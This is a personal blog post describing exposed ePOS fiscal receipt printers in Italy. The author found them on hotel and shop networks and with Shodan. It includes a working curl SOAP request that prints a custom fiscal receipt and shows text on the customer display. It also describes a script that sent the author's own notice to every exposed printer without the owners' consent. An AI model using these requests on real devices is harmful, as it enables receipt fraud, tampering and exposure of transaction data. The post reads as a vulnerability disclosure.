Let's get fiscal - A short finding in exposed servers
This is just an introduction. I first noticed that at an hotel where I stayed ~1 year ago a specific server was exposed on the same wifi network that was available for customers. It was not the only one, but it was by far the most interesting for me.
Even after telling them that, noting has changed, and after 1 year they still had everything exposed for all customers to see and use (such as their printer).
Will be updating during the next 2 weeks.
[Update @Day2] What is this about
I can now tell you that the server was their ePOS servers, the machines that print their receipts. Not only that, but it also had all data on their receipts from the day they started using that machine, publicly available.
I also looked into the manual for that machine, and it exposed some API endpoint (using SOAP, that I don’t like very much), and even a way to upload custom webapps in PHP to their machine (this I did not understand completely, but I will study more).
I used the response that I got from that server to make a research on shodan, using the hash of the response (since it seemed to me that everyone that had the same server should always give the same response). It returned ~250 servers here in Italy exposed.
Of course I planned to contact them all to let them know of their vulnerability. But first I wanted to test if the API worked as I expected, so I had to find a nearby affected server. I found a couple (I live in a pretty big city) where to test if the API would work, since I planned to first try and print on the exposed receipt servers the message about the vulnerability and how to contact me for help if needed.
[Update @Day4] How to use the exposed server
First important problem: the webserver of their ePOS machines exposes a recap of each day of transactions, and the endpoint SOAP also allows me to query the whole list of all single transactions ever made. It’s slow, but it works.
Second problem: the SOAP endpoint also allows me to change configurations in the ePOS (name and logo of the store, that can be uploaded, some currency configs apparently as well), print custom receipts, show custom messages on the screen that is shown to the customers.
Third problem: according to the official docs I found online another endpoint allows me to upload PHP applications that are run on the machine each time a new transaction happens. I did not test this though.
Fourth problem: I think I might be able to spam my personal code for the italian “Lotteria degli Scontrini”, a lottery where people can win actual money by simply paying with their card.
Today I finally went to a store impacted by this (nearby-ish to my office) and tested it personally: I could print a custom receipt with the text I wanted, and I could show a customized text on the screen that is customer facing. I then talked to the store owner so that they knew what was happening, and why.
This is, btw, the CURL request i sent, with some data hidden:
curl --location 'http://{IP}:{PORT}/cgi-bin/fpmate.cgi' \
--header 'Content-Type: application/xml' \
--data '<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<printerFiscalReceipt>
<displayText operator="1" data="Ciao sto facendo un test!" />
<beginFiscalReceipt operator="1" />
<printRecMessage operator="1" messageType="4" message="Stampa di prova" />
<printRecItem operator="1" description="Oggetto molto magico" quantity="1" unitPrice="100" department="1" justification="1" />
<printRecTotal operator="1" description="Monete di rame" payment="100" paymentType="2" index="1" justification="1" />
<displayText operator="1" data="Fine della stampa di prova!" />
<endFiscalReceipt operator="1" />
</printerFiscalReceipt>
</s:Body>
</s:Envelope>
'
Now I needed to contact all of the other interested ePOS owners. On the receipts I could find the store name and some other info (phone, VAT number), and I could, I think, write some code that used those info to find emails that I could contact. But I decided to go all in with the receipts, and I crafted a SOAP request that printed all of the useful info, and a way to contact me (an anonymous alias to my protonmail email), and wrote a simple python script that spammed it to all open servers.
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<printerFiscalReceipt>
<displayText operator="1" data="Questo รจ un avviso importante!" />
<printRecMessage operator="1" messageType="1" message="{a long explainatory message that specifies how this is NOT a ransom}" />
<printRecMessage operator="1" messageType="1" message="{that spans a lot of printRecMessages}" />
<printRecMessage operator="1" messageType="1" message="{and mentions a private alias of my protonmail email}" />
<printRecMessage operator="1" messageType="1" message="Buona giornata!" />
<displayText operator="1" data="Fine dell'\''avviso importante!" />
</printerFiscalReceipt>
</s:Body>
</s:Envelope>
The end
This project can be considered over for me, I got in, I got the info, I contacted the interested parties, I can move on to another project. This was supposed to be the pilot for the 2 weeks projects, but it took me less time, I’ll simply move all the other projects one week and start the new one on monday.
I was even able to start and finish another small project for my children in the meantime, but I’ll post about it likely this weekend.